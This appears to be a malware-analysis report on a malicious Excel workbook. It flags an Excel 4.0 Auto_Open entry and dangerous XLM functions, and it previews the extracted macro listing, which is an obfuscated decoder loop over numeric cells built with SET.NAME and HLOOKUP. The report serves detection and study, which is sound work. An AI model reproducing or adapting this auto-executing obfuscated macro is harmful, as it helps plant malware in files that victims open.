MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6663 bytes |
SHA-256: 588318241a211715e79ae5f1d87a8ba1a1392200a77b187028225076bd43eadf |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - bgSLo
' 0018 27 LABEL : Cell Value, String Constant - aUjZMeIGYjIQ len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!A134
' 0018 27 LABEL : Cell Value, String Constant - FefSHUOSRhXT len=0
' 0018 21 LABEL : Cell Value, String Constant - gwuodN len=0
' 0018 23 LABEL : Cell Value, String Constant - HIidhGWt len=0
' 0018 26 LABEL : Cell Value, String Constant - hRDUouAtTuu len=0
' 0018 22 LABEL : Cell Value, String Constant - iJiSWJI len=0
' 0018 26 LABEL : Cell Value, String Constant - jHzTVkamIbh len=0
' 0018 24 LABEL : Cell Value, String Constant - JjWlBfFFF len=0
' 0018 21 LABEL : Cell Value, String Constant - LshZjz len=0
' 0018 26 LABEL : Cell Value, String Constant - lthEErTtKrn len=0
' 0018 26 LABEL : Cell Value, String Constant - njmVLQWcvSh len=0
' 0018 22 LABEL : Cell Value, String Constant - oXZfRuD len=0
' 0018 27 LABEL : Cell Value, String Constant - PPThoSZvqjTw len=0
' 0018 21 LABEL : Cell Value, String Constant - QpIgDd len=0
' 0018 20 LABEL : Cell Value, String Constant - rWtKU len=0
' 0018 25 LABEL : Cell Value, String Constant - wOkbCCgPcx len=0
' 0018 27 LABEL : Cell Value, String Constant - xeXeUZzzUeIF len=0
' 0018 27 LABEL : Cell Value, String Constant - yHZiPVaLZgby len=0
' 0018 22 LABEL : Cell Value, String Constant - yqquYEp len=0
' 0018 26 LABEL : Cell Value, String Constant - znopXlErSrw len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' bgSLo,A48,"SET.NAME("aUjZMeIGYjIQ",0+VALUE("0"))",""
' bgSLo,R49,"",-317.00000000000000000000
' bgSLo,A50,"SET.NAME("gwuodN",aUjZMeIGYjIQ)",""
' bgSLo,R50,"",-93.00000000000000000000
' bgSLo,R51,"",130.00000000000000000000
' bgSLo,A52,"SET.NAME("jHzTVkamIbh",aUjZMeIGYjIQ)",""
' bgSLo,R52,"",416.00000000000000000000
' bgSLo,R53,"",-205.00000000000000000000
' bgSLo,R54,"",74.00000000000000000000
' bgSLo,A55,"SET.NAME("hRDUouAtTuu",COUNTA(iJiSWJI))",""
' bgSLo,A58,"SET.NAME("PPThoSZvqjTw",COUNTA(yqquYEp))",""
' bgSLo,A61,[],""
' bgSLo,A65,"SET.NAME("njmVLQWcvSh","")",""
' bgSLo,A67,"gwuodN",""
' bgSLo,A71,"SET.NAME("HIidhGWt",HLOOKUP("*",iJiSWJI,gwuodN,FALSE))",""
' bgSLo,A76,"LshZjz",""
' bgSLo,A78,"SET.NAME("xeXeUZzzUeIF",aUjZMeIGYjIQ)",""
' bgSLo,A81,[],""
' bgSLo,A84,"xeXeUZzzUeIF",""
' bgSLo,A87,"FefSHUOSRhXT",""
' bgSLo,A92,"rWtKU",""
' bgSLo,A96,"znopXlErSrw",""
' bgSLo,A101,"SET.NAME("yHZiPVaLZgby",VALUE(HLOOKUP("*",yqquYEp,znopXlErSrw,FALSE)))",""
' bgSLo,A104,"wOkbCCgPcx",""
' bgSLo,A107,"njmVLQWcvSh",""
' bgSLo,A111,"jHzTVkamIbh",""
' bgSLo,A115,NEXT(),""
' bgSLo,A120,"QpIgDd",""
' bgSLo,A122,[],""
' bgSLo,A124,"oXZfRuD",""
' bgSLo,A126,NEXT(),""
' bgSLo,A130,RETURN(),""
' bgSLo,A159,"SET.NAME("JjWlBfFFF",A48)",""
' bgSLo,A164,"iJiSWJI",""
' bgSLo,A169,"SET.NAME("yqquYEp",R90C11)",""
' bgSLo,A171,"SET.NAME("oXZfRuD",180)",""
' bgSLo,A175,"SET.NAME("lthEErTtKrn",1)",""
' bgSLo,A179,JjWlBfFFF(),""
' bgSLo,A180,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.